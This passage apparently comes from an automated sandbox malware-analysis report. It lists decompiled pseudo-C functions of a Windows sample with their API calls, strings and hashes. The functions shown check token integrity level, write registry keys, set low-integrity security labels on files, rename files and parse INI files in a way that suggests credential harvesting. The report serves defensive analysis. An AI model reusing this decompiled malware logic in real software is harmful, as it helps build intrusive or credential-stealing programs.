0x0041468e
0x004146a4
0x0041475a
0x0041475e
0x0041475e
0x004146c3
0x004146c9
0x004146cf
0x00000000
0x00000000
0x004146de
0x004146df
0x004146e1
0x004146fe
0x00414705
0x00414736
0x00414739
0x00414742
0x0041474b
0x00414754
0x00414754
0x00000000
0x0041470c
0x0041470c
0x00414711
0x00414730
0x00414730
0x00000000
0x00414730
0x0041471a
0x00414729
0x00414734
0x00000000
0x00000000
0x00000000
0x00000000
0x00414729

APIs

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 004146C3
WriteFile.KERNEL32(`FA,?,00000146,?,00000000,00000000), ref: 00414701
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00414725
FlushFileBuffers.KERNEL32(?), ref: 00414739
CloseHandle.KERNEL32(?), ref: 00414742

Strings

`FA, xrefs: 004146FE

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID: `FA
API String ID: 2459967240-275680183
Opcode ID: 60095506ee0e9bd23af9dda3764cb528ca562bd6dbe5ccf2e621adaf1b15f13c
Instruction ID: 9de77b7224263c83c391feeb69c15a89e4b88ed9133b3051cf4b630a8498988e
Opcode Fuzzy Hash: 60095506ee0e9bd23af9dda3764cb528ca562bd6dbe5ccf2e621adaf1b15f13c
Instruction Fuzzy Hash: 5021DE71901118BBCF20DB619E45FDF7BBCAB86310F1040A6A514F71D0D7359A81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004085D9, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004085D9(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E00406E55(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E00406E85(_t32);
					goto L12;
				}
			}

0x004085e7
0x004085f1
0x00408687
0x0040868b
0x0040868b
0x0040860d
0x0040867d
0x00408680
0x00000000
0x0040861a
0x00408623
0x00408627
0x0040867c
0x00000000
0x0040867c
0x0040863a
0x0040863e
0x00408646
0x00408648
0x0040864c
0x00408655
0x0040865d
0x00408666
0x00408671
0x00408673
0x00408668
0x00408668
0x00408668
0x00408666
0x0040865d
0x0040864c
0x00408646
0x00408677
0x00000000
0x00408677

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 004085E9
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00408609
GetLastError.KERNEL32(?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 0040860F
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00408636
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 0040863E
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00408655
CloseHandle.KERNEL32(?,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00408680

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: 6ba548ae53092798021f83af267dca89f57c762e0c5a11566a71ce272a64624e
Instruction ID: f5b1dadd1580028ec7ba69aa89cf8f03ebaf4f9cf5e63c4cd5912d0a65ddcbf5
Opcode Fuzzy Hash: 6ba548ae53092798021f83af267dca89f57c762e0c5a11566a71ce272a64624e
Instruction Fuzzy Hash: 72119035540148BFEB115BA0DE84FBE3B6DDB05340F11097AF481F61A0DB3A9E85ABA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413C42, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00413C42(void* _a4, char _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_t28 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t37 =  &_v160;
					_t13 = 4;
					E00405B00(_t13,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E00407B78(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						_t18 = 5;
						E00405B00(_t18,  &_v40);
						_t23 = E0040AFA9(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							_t8 =  &_a8; // 0x4163e3
							ExpandEnvironmentStringsW(_t34,  *_t8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

0x00413c4c
0x00413c53
0x00413c55
0x00413c5d
0x00413c67
0x00413c6d
0x00413c6e
0x00413c73
0x00413c7e
0x00413c84
0x00413c8a
0x00413c8d
0x00413c94
0x00413c95
0x00413cac
0x00413cb3
0x00413cbd
0x00413cc4
0x00413cca
0x00413cd6
0x00413cd8
0x00413cd8
0x00413cb3
0x00413cdd
0x00413ce4
0x00413ce9

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00413C55
LocalFree.KERNEL32(?,.exe,00000000), ref: 00413CDD

Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 00413CBD
ExpandEnvironmentStringsW.KERNEL32(?,cA,00000104), ref: 00413CCA

Strings

cA, xrefs: 00413CC4
.exe, xrefs: 00413C64

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID: .exe$cA
API String ID: 2200435814-4092861274
Opcode ID: 927c602cd6b40307fbb4b1e268728d14d4bb18f478316434f8f71c5a7e366474
Instruction ID: bad26ef6ef1263c8d40d87959d7a2ce828c59dde085bc9040cc76e6066bb3762
Opcode Fuzzy Hash: 927c602cd6b40307fbb4b1e268728d14d4bb18f478316434f8f71c5a7e366474
Instruction Fuzzy Hash: 9B11A372740114ABDB10AB69DD09FDB3BACEF45360F100026B945F71A0E678EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040B39F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B39F(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E0040B204(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x0040b3c4
0x0040b3c7
0x0040b3c9
0x0040b3cb
0x0040b3d4
0x0040b3d7
0x0040b3e0
0x0040b3fd
0x00000000
0x0040b3ff
0x0040b402
0x0040b408
0x0040b415
0x00000000
0x00000000
0x00000000
0x0040b408
0x0040b419
0x0040b41c
0x00000000
0x0040b40a
0x0040b40a
0x0040b40d
0x00000000
0x0040b413
0x0040b41f
0x0040b425

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 0040B3C7

Part of subcall function 0040B204: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0040B325

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0040B3F9
RegCloseKey.ADVAPI32(?), ref: 0040B402
RegCloseKey.ADVAPI32(?), ref: 0040B41C

Strings

d, xrefs: 0040B40D
SOFTWARE\Microsoft, xrefs: 0040B3BA

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: 7693a883b28b06995ab496e60fbbc0bb7bd75e30fd228a1cb357efaefcc74ca9
Instruction ID: 2c515019c25e1e1d069e116a37536aee59250cb8095da9f882965170367ff3f7
Opcode Fuzzy Hash: 7693a883b28b06995ab496e60fbbc0bb7bd75e30fd228a1cb357efaefcc74ca9
Instruction Fuzzy Hash: B21152B190021CBEEB019B949C80EEFBB7CEB54388F104076F611B2251D3759E458BB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E164, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E164(WCHAR* __ebx, void* __ecx, char _a4) {
				void* __edi;
				long _t3;
				WCHAR* _t13;

				_t13 = __ebx;
				if( *0x423348 == 0) {
					E004131E9(__ecx, 0x423348, 2);
					 *((short*)(E00406EC1(0x423550, 0x423348, E004079D4(0x423348) + _t10) + 0x423550)) = 0;
					_t3 = PathRemoveFileSpecW(0x423550);
				}
				if(_t13 != 0) {
					E00407226(_t3 | 0xffffffff, 0x423348, _t13);
					_t3 = PathRenameExtensionW(_t13, L".tmp");
				}
				if(_a4 != 0 &&  *0x423bd4 > 1) {
					E0040C48C(0x423550);
					E0040A506(0x423550);
					_t3 = GetFileAttributesW(0x423348);
					if(_t3 != 0xffffffff) {
						return E0040A506(0x423348);
					}
				}
				return _t3;
			}

0x0040e164
0x0040e178
0x0040e17c
0x0040e195
0x0040e19c
0x0040e19c
0x0040e1a4
0x0040e1ad
0x0040e1b8
0x0040e1b8
0x0040e1c3
0x0040e1cf
0x0040e1d5
0x0040e1db
0x0040e1e4
0x00000000
0x0040e1e7
0x0040e1e4
0x0040e1ee

APIs

PathRemoveFileSpecW.SHLWAPI(00423550,00423550,00423348,00000000,00000002,00000000,00020000,0040EC5E,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722), ref: 0040E19C
PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,0040EC5E,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,00000000,?), ref: 0040E1B8
GetFileAttributesW.KERNEL32(00423348,00423550,00423550,00000000,00020000,0040EC5E,00000001,?,8793AEF2,00000002,00002723,00020000,00000002,00002722,00020000,00000000), ref: 0040E1DB

Part of subcall function 004131E9: PathRenameExtensionW.SHLWAPI(?,.dat,?,004239C8,00000000,00000032,?,77E49EB0,00000000), ref: 00413262

Strings

H3B, xrefs: 0040E16E
.tmp, xrefs: 0040E1B2
P5B, xrefs: 0040E173

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ExtensionFileRename$AttributesRemoveSpec
String ID: .tmp$H3B$P5B
API String ID: 3627892477-3281944230
Opcode ID: 5a6240aace92d7e76eaf0a0fe9233108732b342abd6de2ab64eaf25bdb9bde73
Instruction ID: ae40f86ead6c6536278a5941d07488a2f58a62d0c6f9d2e450e8db842c3791d2
Opcode Fuzzy Hash: 5a6240aace92d7e76eaf0a0fe9233108732b342abd6de2ab64eaf25bdb9bde73
Instruction Fuzzy Hash: 02F0A230B0029036E2213B379C4AA7F596D5F82725B14863FB515B62E2CFBC4A9242AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040A506, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040A506(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E00408551(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x0040a512
0x0040a514
0x0040a51a
0x0040a525
0x0040a52d
0x0040a53e
0x0040a541
0x0040a549
0x0040a558
0x0040a560
0x0040a562
0x0040a562
0x0040a560
0x0040a567
0x0040a567
0x0040a571

APIs

Part of subcall function 00408551: GetCurrentThread.KERNEL32 ref: 00408561
Part of subcall function 00408551: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 00408568
Part of subcall function 00408551: OpenProcessToken.ADVAPI32(000000FF,00000020,J[A,?,?,?,?,00415B4A,SeTcbPrivilege), ref: 0040857A

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040A525
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 0040A541
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 0040A558
LocalFree.KERNEL32(00000000), ref: 0040A567

Strings

SeSecurityPrivilege, xrefs: 0040A50D
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 0040A520

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: 7104e8038013e29fa969d4fcd2453f2d6c3365d1e1111f348ee648a3b5827875
Instruction ID: 4272f7f255740fe5622442afaba2600605d7c445861dcd59decfd2094d30ec35
Opcode Fuzzy Hash: 7104e8038013e29fa969d4fcd2453f2d6c3365d1e1111f348ee648a3b5827875
Instruction Fuzzy Hash: 270119B5640208BFEB019BA08EC5FEE7B7CAB04784F040476B641B21A1D6799A549A28

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC5F, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040FC5F(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E0040FB80(_t70, _t79, _a4, _a20);
						_a20 = _t47;
						__eflags = _t66 - 8;
						if(__eflags > 0) {
							__eflags = _t66 - 9;
							if(__eflags == 0) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									__eflags = _t47 - 0xa5;
									if(_t47 != 0xa5) {
										L35:
										return _t47;
									}
									_t47 = 0xffff;
									L59:
									__eflags = _t47;
									if(_t47 == 0) {
										goto L35;
									}
									__eflags = _t47 - 0xffff;
									if(_t47 != 0xffff) {
										L33:
										_push(_a28);
										_push(_t47 & 0x0000ffff);
										_push(0x112);
										L34:
										_t47 = PostMessageW(_a4, ??, ??, ??);
										goto L35;
									}
									L61:
									_push(_a28);
									_push(_a4);
									_push(0x7b);
									goto L34;
								}
								_t47 =  *(_a8 + 0x24);
								__eflags = _t47 & 0x00010000;
								if((_t47 & 0x00010000) == 0) {
									goto L35;
								}
								asm("sbb eax, eax");
								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
								goto L59;
							}
							if(__eflags <= 0) {
								L25:
								_push(_a28);
								_push(_t66);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t66 - 0x11;
							if(_t66 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_t47 = E0040F9F0(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
								}
								goto L35;
							}
							__eflags = _t66 - 0x14;
							if(_t66 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t66 - 0x15;
							if(_t66 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t66 - 2;
						if(_t66 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t66 - 3;
						if(_t66 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t66 - 5;
						if(_t66 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t79 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t66 - 6 - 1;
						if(_t66 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							E0040F9F0(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
							_t47 = _a20;
							_t66 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E0040D915(0, _t79, 0);
					_push(_a24);
					_push(_t58 & 0x0000ffff);
					_t47 = E0040FB80(_t79, _t79, _a4, _a16);
					goto L10;
				}
			}

0x0040fc5f
0x0040fc62
0x0040fc66
0x0040fc69
0x0040fc71
0x0040fc8e
0x0040fc96
0x00000000
0x00000000
0x0040fc98
0x0040fcb3
0x0040fcbb
0x0040fcd1
0x00000000
0x00000000
0x00000000
0x00000000
0x0040fcd7
0x0040fcd7
0x0040fcd7
0x0040fced
0x0040fcf5
0x0040fcfc
0x0040fd27
0x0040fd2c
0x0040fd2f
0x0040fd32
0x0040fe49
0x0040fe4c
0x0040fe91
0x0040fe96
0x0040fec1
0x0040fec6
0x0040fde0
0x0040fde4
0x0040fde4
0x0040fecc
0x0040fece
0x0040fece
0x0040fed1
0x00000000
0x00000000
0x0040fed7
0x0040feda
0x0040fdcf
0x0040fdcf
0x0040fdd5
0x0040fdd6
0x0040fddb
0x0040fdde
0x00000000
0x0040fdde
0x0040fee0
0x0040fee0
0x0040fee3
0x0040fee6
0x00000000
0x0040fee6
0x0040fe9b
0x0040fe9e
0x0040fea3
0x00000000
0x00000000
0x0040feb0
0x0040febc
0x00000000
0x0040febc
0x0040fe4e
0x0040fd9d
0x0040fd9d
0x0040fda0
0x0040fd1b
0x0040fd1b
0x00000000
0x0040fd1b
0x0040fe54
0x0040fe57
0x0040fe0b
0x0040fe0b
0x0040fe10
0x0040fe24
0x0040fe24
0x00000000
0x0040fe10
0x0040fe59
0x0040fe5c
0x0040fe7c
0x0040fe81
0x0040fd75
0x0040fd75
0x0040fd7a
0x0040fd7a
0x00000000
0x00000000
0x00000000
0x0040fd7c
0x0040fdca
0x0040fdca
0x00000000
0x0040fdca
0x0040fe5e
0x0040fe61
0x00000000
0x00000000
0x0040fe67
0x0040fe6c
0x00000000
0x00000000
0x0040fe72
0x00000000
0x0040fe72
0x0040fd38
0x0040fe2b
0x0040fe30
0x00000000
0x00000000
0x0040fe36
0x0040fe39
0x0040fe40
0x00000000
0x00000000
0x0040fe42
0x00000000
0x0040fe42
0x0040fd3e
0x0040fd41
0x0040fdf9
0x0040fdfe
0x00000000
0x00000000
0x0040fe00
0x0040fe05
0x00000000
0x00000000
0x00000000
0x0040fe05
0x0040fd47
0x0040fd4a
0x0040fdc3
0x0040fdc8
0x0040fde7
0x0040fdec
0x00000000
0x00000000
0x0040fdf2
0x00000000
0x0040fdf2
0x00000000
0x0040fdc8
0x0040fd4c
0x0040fd4f
0x0040fda6
0x0040fdab
0x0040fdb6
0x0040fdbb
0x00000000
0x00000000
0x0040fdbd
0x0040fdbf
0x0040fdb1
0x0040fdb1
0x00000000
0x0040fdb1
0x0040fdad
0x0040fdaf
0x00000000
0x0040fdaf
0x0040fd54
0x0040fd57
0x00000000
0x00000000
0x0040fd59
0x0040fd5e
0x0040fd92
0x0040fd97
0x0040fd9a
0x00000000
0x0040fd9a
0x0040fd60
0x0040fd65
0x00000000
0x00000000
0x0040fd67
0x0040fd6c
0x00000000
0x00000000
0x0040fd6e
0x0040fd73
0x00000000
0x00000000
0x00000000
0x0040fd73
0x0040fd04
0x0040fd09
0x0040fd0f
0x0040fd16
0x00000000
0x0040fd16

APIs

GetAncestor.USER32(?,00000002), ref: 0040FC88
SendMessageTimeoutW.USER32 ref: 0040FCB3
PostMessageW.USER32(?,00000020,?,00000000), ref: 0040FCF5
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040FD8B
PostMessageW.USER32(?,00000112,?,?), ref: 0040FDDE
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040FE1D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: 223432a51a3515d8e8a63b8f871a186d4ff3ee4116a2865315f5bff99d96101e
Instruction ID: f4df5864e722bfe2dca3335a46ca8ba8b9232c2560144d61bffc566e945fae44
Opcode Fuzzy Hash: 223432a51a3515d8e8a63b8f871a186d4ff3ee4116a2865315f5bff99d96101e
Instruction Fuzzy Hash: 2651AF30600309AAEF305E58CC89BBE3615EF05754F240433F942F6AE2C27CC989E69A

Uniqueness

Uniqueness Score: -1.00%

Function 004186E4, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004186E4(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t69;
				WCHAR* _t72;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t111;
				WCHAR* _t112;
				WCHAR* _t117;
				intOrPtr _t126;
				signed int _t127;
				void* _t129;

				_t129 = (_t127 & 0xfffffff8) - 0x284;
				if(E0040C70A( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t132 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t117 = E00406E55(0x1fffe);
					_v628 = _t117;
					__eflags = _t117;
					if(_t117 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E00406E85(_t117);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E00407D35(_t117, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t111 = E00406E55(0xc1c);
					_v640 = _t111;
					__eflags = _t111;
					if(_t111 != 0) {
						_t11 =  &(_t111[0x2fd]); // 0x5fa
						_v632 = _t11;
						_v644 = _t117;
						_t61 = 0x72;
						E00405B00(_t61,  &_v584);
						_t63 = 0x73;
						E00405B00(_t63,  &_v596);
						_t65 = 0x74;
						E00405B00(_t65,  &_v608);
						_t67 = 0x75;
						E00405B00(_t67,  &_v624);
						_t69 = 0x76;
						E00405B00(_t69,  &_v616);
						goto L9;
						L18:
						_t74 = E00407D71(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t111 = _v644;
							L9:
							_t72 = StrStrIW(_v644,  &_v584);
							__eflags = _t72;
							if(_t72 == 0) {
